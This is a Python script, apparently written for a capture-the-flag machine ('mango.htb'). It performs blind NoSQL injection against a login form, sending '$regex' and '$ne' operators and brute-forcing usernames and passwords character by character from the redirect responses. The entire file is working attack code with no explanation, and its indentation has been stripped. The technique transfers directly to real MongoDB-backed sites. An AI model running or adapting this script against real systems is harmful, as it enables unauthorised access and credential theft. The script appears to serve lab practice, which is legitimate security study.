import requests

class color:
PURPLE = '\033[95m'
CYAN = '\033[96m'
DARKCYAN = '\033[36m'
BLUE = '\033[94m'
GREEN = '\033[92m'
YELLOW = '\033[93m'
RED = '\033[91m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
END = '\033[0m'

def inject(data):
r = requests.post('
http://staging-order.mango.htb/',
 data=data, allow_redirects=False)
if r.status_code != 200:#we found with burp that the non 200 (301) was a successfull match
return True

def leakUser(secret):
payload = ""
notFound = False
while True:
data = {"username[$regex]":"^"+payload+"$", "password[$ne]":"asdjkf", "login":"login"}
if inject(data): #break infinate loop when we no longer have acurate guesses.
print(color.GREEN +color.BOLD +"\r"+payload + color.END, flush=True)
userList.append(payload)
break #break function after we find a user
if notFound:
#print("\r", flush=True)
break
for i in range(97, 123):#ascii character range (a-b)
payload = secret + chr(i)
print("\r"+payload, flush=False, end='')
data = {"username[$regex]": "^" + payload, "password[$ne]":"asdjkf", "login":"login"}
if inject(data):
print("\r"+payload, flush=True, end='')
secret = secret + chr(i)
notFound = False
break
notFound = True

def leakPass(user):
payload = ""
secret = ""
while True:
data = {"username[$regex]":"^"+payload+"$", "password[$ne]":"randtext", "login":"login"}
if inject(data): #break infinate loop when we no longer have acurate guesses.
break
if payload.endswith("$$"):
print(color.RED +color.BOLD + "\r"+payload[:-2]+color.END, flush=True)
break
for i in range(32, 127):#ascii character range (a-b)
if chr(i) in ['.','?','*','^','+','|']:
payload = secret + "\\" + chr(i)
else:
payload = secret + chr(i)
print("\r"+ payload, flush=False, end='')
data = {"username": user, "password[$regex]":"^"+payload, "login":"login"}
if inject(data):
print("\r"+payload, flush=True, end='')
secret = secret + chr(i)
break

if __name__ == '__main__':
secret = "" #force start of enumeration with a letter or name
userList = []
print()
print(color.YELLOW +color.BOLD + color.UNDERLINE + "---Leaking NoSQL Users---" +color.END)
for i in range(97, 123):
leakUser(chr(i))
print(color.YELLOW +color.BOLD + color.UNDERLINE + '\r'+ "---Leaking NoSQL Passwords---" +color.END, flush=True)
for user in userList:
print(color.GREEN +color.BOLD + '+ '+user+" +"+color.END)
leakPass(user)

print()
exit(0)